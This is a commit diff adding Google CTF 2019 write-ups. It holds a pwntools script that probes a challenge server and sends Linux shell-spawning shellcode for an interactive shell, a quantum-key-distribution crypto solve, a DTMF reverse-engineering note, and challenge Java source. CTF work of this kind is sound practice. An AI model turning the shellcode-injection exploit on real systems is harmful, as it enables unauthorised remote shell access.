[writeup] add google ctf 2019 (part)

Author: onealmond

google-ctf-2019/MicroServiceDaemonOS/shellcode.py

@@ -0,0 +1,44 @@
+import pwn
+
+
+def remote():
+    conn = pwn.remote("microservicedaemonos.ctfcompetition.com", 1337)
+    line = conn.readline()
+    print(line)
+    line = conn.read(numb=len('Provide command: '))
+    print(line)
+    conn.writeline('l')  # command l
+    line = conn.read(numb=len('Provide type of trustlet: '))
+    print(line)
+    conn.writeline('0')  #   trustlet type 1
+
+    line = None
+    offs = 0
+    while offs <= 0x7ff1:
+        print('offset', offs)
+        line = conn.read(numb=len('Provide command: '))
+        print(line)
+        conn.writeline('c')  # command c
+        line = conn.read(numb=len('Provide index of ms: '))
+        print(line)
+        conn.writeline('0')  #   index of ms
+        line = conn.read(numb=len('call type: '))
+        print(line)
+        conn.writeline('g')  #   call type
+        line = conn.read(numb=len('provide page offset: '))
+        print(line)
+        conn.writeline(str(offs))  #   offset
+        line = conn.read(numb=len('provide page count: '))
+        print(line)
+        conn.writeline(str(1))  # count
+        line = conn.readline()
+        print(line)
+        if line == '0':
+            break
+        offs += 1
+
+    conn.writeline(pwn.asm(pwn.shellcraft.i386.linux.sh()))
+    conn.writeline('')
+    conn.interactive()
+
+remote()

google-ctf-2019/cryptoqkd.web.ctfcompetition.com/decode.sh

@@ -0,0 +1,8 @@
+key="404c368bf890dd10abc3f4209437fcbb"
+ciphertext="U2FsdGVkX182ynnLNxv9RdNdB44BtwkjHJpTcsWU+NFj2RfQIOpHKYk1RX5i+jKO"
+
+key="946cff6c9d9efed002233a6a6c7b83b1"
+ciphertext="U2FsdGVkX19OI2T2J9zJbjMrmI0YSTS+zJ7fnxu1YcGftgkeyVMMwa+NNMG6fGgjROM/hUvvUxUGhctU8fqH4titwti7HbwNMxFxfIR+lR4="
+
+echo "$key" > /tmp/plain.key; xxd -r -p /tmp/plain.key > /tmp/enc.key
+echo "$ciphertext" | openssl enc -d -aes-256-cbc -pbkdf2 -md sha1 -base64 --pass file:/tmp/enc.key

google-ctf-2019/cryptoqkd.web.ctfcompetition.com/post.py

@@ -0,0 +1,100 @@
+import requests
+import json
+from qkd import *
+import numpy
+import random
+import numpy
+
+def test(rx_qubits, rx_basis):
+  random.seed()
+  key = '404c368bf890dd10abc3f4209437fcbb'
+  # Multiply the amount of bits in the encryption key by 4 to obtain the amount of basis.
+  sat_basis = [random.choice('+x') for _ in range(len(key)*16)]
+  measured_bits = measure(unmarshal(rx_qubits), sat_basis)
+  binary_key, err = compare_bases_and_generate_key(rx_basis, sat_basis, measured_bits)
+  if err:
+    return None, None, err
+  # ENCRYPTION_KEY is in hex, so multiply by 4 to get the bit length.
+  binary_key = binary_key[:len(key)*4]
+  if len(binary_key) < (len(key)*4):
+    return None, sat_basis, "not enough bits to create shared key: %d want: %d" % (len(binary_key), len(key))
+  return binary_key, sat_basis, None
+
+
+def validate(q):
+    p0 = round(pow(q.real, 2), 1)
+    p1 = round(pow(q.imag, 2), 1)
+    random.seed()
+
+    try:
+        numpy.random.choice(numpy.arange(0, 2), p=[p0, p1])
+    except ValueError:
+        return False
+    return True
+
+def find_prob(total, step=0.1, rotate=False):
+    rx = []
+    i = 0.0
+    while i <= 1 and len(rx) < total:
+        j = 0.0
+        while j <= 1 and len(rx) < total:
+            qx = {'real': round(i, 2), 'imag': round(j, 2)}
+            q = complex(qx['real'], qx['imag'])
+
+            if rotate:
+                qr = rotate_45(q)
+                if validate(qr):
+                    rx.append({"real": qx['real'], "imag": qx['imag']})
+            else:
+                if validate(q):
+                    rx.append({"real": qx['real'], "imag": qx['imag']})
+            j += step
+        i += step
+    return rx
+
+def random_qubits():
+    qubits = []
+    _x = find_prob(512, 0.2, True)
+    _r = find_prob(512, 0.2, False)
+    basis = [random.choice('+x') for _ in range(512)]
+    qubits = []
+
+    for b in basis:
+        if b == '+':
+            qubits.append(random.choice(_r))
+        else:
+            qubits.append(random.choice(_x))
+
+    data = {
+        "basis": basis,
+        "qubits": qubits
+        }
+
+def post(data):
+    headers = {
+            "Content-Type": "application/json",
+            }
+
+    rsp = requests.post(
+            'https://cryptoqkd.web.ctfcompetition.com/qkd/qubits',
+            data=json.dumps(data),
+            headers=headers)
+
+    print(rsp.text)
+    sat = rsp.json()
+    print(sat["basis"]==data["basis"])
+    ann = int(sat["announcement"], 16)
+    print(ann)
+    """
+    the encryption key should be 16bytes = 128bits long, guess announce XOR the shared key to get the encryption key
+    """
+    print(hex(ann^(2**128-1)))
+
+#random.seed()
+basis = ['+'] * 512
+qubits = [{'real': 0, 'imag': 1}]*512
+data = {
+        "basis": basis,
+        "qubits": qubits
+        }
+post(data)

google-ctf-2019/cryptoqkd.web.ctfcompetition.com/qkd.py

@@ -0,0 +1,47 @@
+import random
+import numpy
+
+from math import sqrt
+#from flask import current_app
+
+def rotate_45(qubit):
+  return qubit * complex(0.707, -0.707)
+
+def measure(rx_qubits, basis):
+  measured_bits = ""
+  for q, b in zip(rx_qubits, basis):
+    if b == 'x':
+      q = rotate_45(q)
+    probability_zero = round(pow(q.real, 2), 1)
+    probability_one = round(pow(q.imag, 2), 1)
+    #print('validate', b, q, probability_zero, probability_one, probability_zero+probability_one)
+    measured_bits += str(numpy.random.choice(numpy.arange(0, 2), p=[probability_zero, probability_one]))
+  return measured_bits
+
+def compare_bases_and_generate_key(tx_bases, rx_bases, measure):
+  """Compares TX and RX bases and return the selected bits."""
+  if not (len(tx_bases) == len(rx_bases) == len(measure)):
+    return None, "tx_bases(%d), rx_bases(%d) and measure(%d) must have the same length." % (len(tx_bases), len(rx_bases), len(measure))
+  ret = ''
+  for bit, tx_base, rx_base in zip(measure, tx_bases, rx_bases):
+    if tx_base == rx_base:
+      ret += bit
+  return ret, None
+
+def unmarshal(qubits):
+  return [complex(q['real'], q['imag']) for q in qubits]
+
+# Receive user's qubits and basis, return the derived key and our basis.
+def perform(rx_qubits, rx_basis):
+  random.seed()
+  # Multiply the amount of bits in the encryption key by 4 to obtain the amount of basis.
+  sat_basis = [random.choice('+x') for _ in range(len(current_app.config['ENCRYPTION_KEY'])*16)]
+  measured_bits = measure(unmarshal(rx_qubits), sat_basis)
+  binary_key, err = compare_bases_and_generate_key(rx_basis, sat_basis, measured_bits)
+  if err:
+    return None, None, err
+  # ENCRYPTION_KEY is in hex, so multiply by 4 to get the bit length.
+  binary_key = binary_key[:len(current_app.config['ENCRYPTION_KEY'])*4]
+  if len(binary_key) < (len(current_app.config['ENCRYPTION_KEY'])*4):
+    return None, sat_basis, "not enough bits to create shared key: %d want: %d" % (len(binary_key), len(current_app.config['ENCRYPTION_KEY']))
+  return binary_key, sat_basis, None

google-ctf-2019/dialtone/writeup.md

@@ -0,0 +1,44 @@
+Decompile the program with Ghida, we learned that
+
+* it return SUCCEED if result of function `r` is greater than 0, other wise FAILED.
+
+Take a look at function `r`.
+
+local_58 is using high frequencies [1209, 1336, 1477, 1633]
+local_78 is using low frequencies [697, 770, 852, 941]
+
+The big switch to check the state and the index of selected frequencies, `r` results in succeeded if the correct combination is found.
+
+According to [keypad frequency](https://en.wikipedia.org/wiki/Dual-tone_multi-frequency_signaling#Keypad)
+
+DTMF keypad frequencies (with sound clips)
+        1209 Hz    1336 Hz    1477 Hz    1633 Hz
+697 Hz    1          2          3          A
+770 Hz    4          5          6          B
+852 Hz    7          8          9          C
+941 Hz    *          0          #          D
+
+```
+local_c = local_20 << 2 | local_c;
+```
+
+The lower two bits represent high frequency, the higher two bits represent low freqency.
+
+Take a look at the switch block
+
+
+high = [1209, 1336, 1477, 1633]
+low = [697, 770, 852, 941]
+
+position 0: local_c should be 9(0b1001), (low[0b10],high[0b01]) = (852Hz,1336Hz) = 8
+position 1: local_c should be 5(0b0101), (low[0b01],high[0b01]) = (770Hz,1336Hz) = 5
+position 2: local_c should be 10(0b1010), (low[0b10],high[0b10]) = (852Hz,1477Hz) = 9
+position 3: local_c should be 6(0b0110), (low[0b01],high[0b10]) = (770Hz,1477Hz) = 6
+position 4: local_c should be 9(0b1001), (low[0b10],high[0b01]) = (852Hz,1336Hz) = 8
+position 5: local_c should be 8(0b1000), (low[0b10],high[0b00]) = (852Hz,1209Hz) = 7
+position 6: local_c should be 1(0b0001), (low[0b00],high[0b01]) = (697Hz,1336Hz) = 2
+position 7: local_c should be 0xd(0b1101), (low[0b11],high[0b01]) = (941Hz,1336Hz) = 0
+position 8: 0 is invalid, make it 1
+
+
+So the key sequence is 859687201.

google-ctf-2019/jit/fancyjit/FancyJIT.java

@@ -0,0 +1,144 @@
+import com.sun.jna.Library;
+import com.sun.jna.Native;
+
+import java.util.*;
+import java.util.function.Function;
+
+public class FancyJIT {
+    public interface CompilierLib extends Library {
+        CompilierLib INSTANCE = Native.load("compiler", CompilierLib.class);
+
+        int run(String[] program, int proglen);
+    }
+
+    static class Instr {
+        String name;
+        char reg;
+        int arg;
+
+        Instr(String name, char reg, int arg) {
+            this.name = name;
+            this.reg = reg;
+            this.arg = arg;
+        }
+    }
+
+    static class Parser {
+        static HashMap<String, Function<String, Optional<Instr>>> parsers = new HashMap<>();
+        static Function<String, Optional<Instr>> parse2Arg = (String cmd) -> {
+            if (cmd.charAt(4) != 'A' && cmd.charAt(4) != 'B') {
+                return Optional.empty();
+            }
+            if (cmd.charAt(5) != ',' || cmd.charAt(6) != ' ') {
+                return Optional.empty();
+            }
+            return Optional.of(new Instr(
+                    cmd.substring(0, 3),
+                    cmd.charAt(4),
+                    Integer.parseInt(cmd.substring(7, cmd.length() - 1))));
+        };
+        static Function<String, Optional<Instr>> parse1Arg = (String cmd) -> {
+            return Optional.of(new Instr(
+                    cmd.substring(0, 3),
+                    'X',
+                    Integer.parseInt(cmd.substring(4, cmd.length() - 1))));
+        };
+        static Function<String, Optional<Instr>> parse0Arg = (String cmd) -> {
+            if (cmd.length() != 5) {
+                return Optional.empty();
+            }
+            return Optional.of(new Instr(cmd.substring(0, 3), 'X', 0));
+        };
+        static {
+            parsers.put("MOV", parse2Arg);
+            parsers.put("ADD", parse2Arg);
+            parsers.put("SUB", parse2Arg);
+            parsers.put("CMP", parse2Arg);
+            parsers.put("LDR", parse2Arg);
+            parsers.put("STR", parse2Arg);
+            parsers.put("JMP", parse1Arg);
+            parsers.put("JNE", parse1Arg);
+            parsers.put("JEQ", parse1Arg);
+            parsers.put("SUM", parse0Arg);
+            parsers.put("RET", parse0Arg);
+        }
+
+        static Optional<Instr> parse(String cmd) {
+            if (cmd.length() < 5) {
+                return Optional.empty();
+            }
+            if (cmd.charAt(3) != '(' || cmd.charAt(cmd.length() - 1) != ')') {
+                return Optional.empty();
+            }
+            return parsers.getOrDefault(cmd.substring(0, 3), x -> Optional.empty()).apply(cmd);
+        }
+    }
+
+    private static boolean validate(String[] program) {
+        if (program.length > 800) {
+            return false;
+        }
+        for (int i = 0; i < program.length; i++) {
+            String cmd = program[i];
+            Optional<Instr> oinstr = Parser.parse(cmd);
+            if (!oinstr.isPresent()) {
+                return false;
+            }
+            Instr instr = oinstr.get();
+            switch (instr.name) {
+                case "MOV":
+                    if (instr.arg < 0 || instr.arg > 99999) {
+                        return false;
+                    }
+                    break;
+                case "ADD":
+                case "SUB":
+                case "CMP":
+                    if (instr.arg < 0 || instr.arg > 99999 || instr.reg != 'A') {
+                        return false;
+                    }
+                    break;
+                case "LDR":
+                case "STR":
+                    if (instr.arg < 0 || instr.arg > 30) {
+                        return false;
+                    }
+                    break;
+                case "JMP":
+                case "JNE":
+                case "JEQ":
+                    if (instr.arg < 0 || instr.arg >= program.length || Math.abs(i - instr.arg) > 20) {
+                        return false;
+                    }
+                    break;
+                case "SUM":
+                case "RET":
+                    break;
+                default:
+                    return false;
+            }
+        }
+        return true;
+    }
+
+    public static void main(String[] args) {
+        System.out.println("Please enter your program. We'll JIT-compile it, run, and show you the result:");
+        Scanner scanner = new Scanner(System.in);
+        ArrayList<String> prog = new ArrayList<>();
+        while (true) {
+            String line = scanner.nextLine();
+            if (line.isEmpty()) {
+                break;
+            }
+            prog.add(line);
+        }
+        // System.err.println(prog);
+        String[] progArr = prog.toArray(new String[0]);
+        if (!validate(progArr)) {
+            System.out.println("Sorry, your program has some errors.");
+        } else {
+            int res = CompilierLib.INSTANCE.run(progArr, progArr.length);
+            System.out.println("Here is your computation result: " + res);
+        }
+    }
+}